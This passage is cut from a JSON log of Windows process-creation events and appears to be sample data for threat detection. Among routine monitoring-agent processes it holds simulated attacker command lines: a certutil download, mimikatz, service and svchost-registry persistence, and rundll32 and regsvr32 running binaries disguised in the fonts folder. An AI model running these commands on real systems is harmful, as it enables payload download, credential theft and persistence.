C:\\\\Users\\\\Administrator\\n\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe  /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe  464 0 0x0110:40\",\"mt.exe  port\",\"mt.exe  smb\",\"hd.exe  -pslist\",\"hd.exe  -enum\",\"netsh.exe  PortOpenning\",\"certutil  -urlcache -split -f http://127.0.0.1/\",\".\\\\reg  add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\nNT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg  delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\nNT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc  create MSTICTestService binPath=C:\\\\Users\\\\MSTIC\\nA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test\\nService\\\"\",\"sc  delete MSTICTestService\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"cmd  /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\".\\\\reg.exe   add \\\"hkcu\\\\console\\\" /v windowposition\\n/t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\"\",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe  /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32  /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo\\nwsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd\\n9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua\\n/installsource scheduler\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua\\n/installsource scheduler\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"taskhostw.exe SYSTEM\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\ICT\\n2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\ICT\\n2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\ICT\\n2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\Resources\\\\222\\\\pmfexe.exe\\\" -PerfMode optimize\\n-quickscan -event -json -alldetectors\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\"],\"EventID\":[4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,